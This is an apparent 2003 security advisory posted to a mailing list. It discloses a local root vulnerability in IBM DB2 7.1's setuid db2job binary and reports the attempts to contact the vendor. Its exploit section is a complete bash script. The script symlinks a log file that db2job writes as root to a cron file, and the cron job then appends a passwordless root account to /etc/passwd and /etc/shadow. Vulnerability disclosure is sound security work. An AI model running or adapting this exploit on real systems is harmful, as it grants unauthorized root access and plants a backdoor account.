Date: Tue, 5 Aug 2003 16:09:09 +0200 (CEST)
From: [email protected]
To: [email protected]Subject: Local Vulnerability in IBM DB2 7.1 db2job binary
Title: Local Vulnerability in IBM DB2 7.1 db2job binary
Date: 27-07-2003
Platform: Only tested in Linux but can be exported to others.
Impact: Users with exec perm over ./db2as/sqllib/adm/db2job can create files
with 770 mode and owned by root.
Author: Juan Manuel Pascual Escriba <pask@uninet.edu.>
Status: Vendor contacted details below.
PROBLEM SUMMARY:
There is a write permisions checking error in db2job binary that can be used by local
users with exec perm over db2job to write any file owned by root with mode 770.
DESCRIPTION
db2job is installed with 4550 perm and owned by root.db2asgrp in my default installation
[pask@dimoniet home]$ ls -alc ./db2as/sqllib/adm/db2job
-r-sr-x--- 1 root db2asgrp 339402 Jun 21 2002 ./db2as/sqllib/adm/db2job
only db2as and db2inst1 are in db2asgrp then they are the only users that can achieve root
privileges with this bug. Always the sysmanager can chmod 6555 db2job for admin purposes, and
the users go wide.
The binary does'nt drop privileges before writing the log and writes the next files owned by root:
-rw-r----- 1 root db2asgrp /home/db2as/sqllib/db2jobht.prf
-rw-r----- 1 root db2asgrp /home/db2as/sqllib/db2jobht.bak
-rw-r----- 1 root db2asgrp /home/db2as/sqllib/db2jobsm.bak
-rwxrwx--- 1 root db2asgrp /home/db2as/sqllib/0_1.out
IMPACT:
Easy to overwrite or create new files owned by root (.rhosts, cron files) via link
injection....
EXPLOIT
#!/bin/bash
DB2JOB=/home/db2as/sqllib/adm/db2job
CRONFILE=/etc/cron.hourly/pakito
USER=pakito
unset DB2INSTANCE
export DB2DIR=./trash
if [ -d $DB2DIR ]; then
echo Trash directory already created
else
mkdir $DB2DIR
fi
cd $DB2DIR
if [ -f ./0_1.out ]; then
echo Link Already Created
else
ln -s $CRONFILE ./0_1.out
fi
$DB2JOB
echo "echo "#!/bin/bash"" > $CRONFILE
echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE
echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE
echo " must wait until cron execute $CRONFILE and then exec su pakito"
STATUS
This bug was reported to [email protected] on July 27.
After that on July 29 IBM sec staff forwards as bcc my emails to with db2
security team. At 5th August i have'nt any idea about db2 sec team emails
or how to contact it.
--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba [email protected]
http://concepcion.upv.es/~pask/advisories/2003/IBM%20DB2%20db2job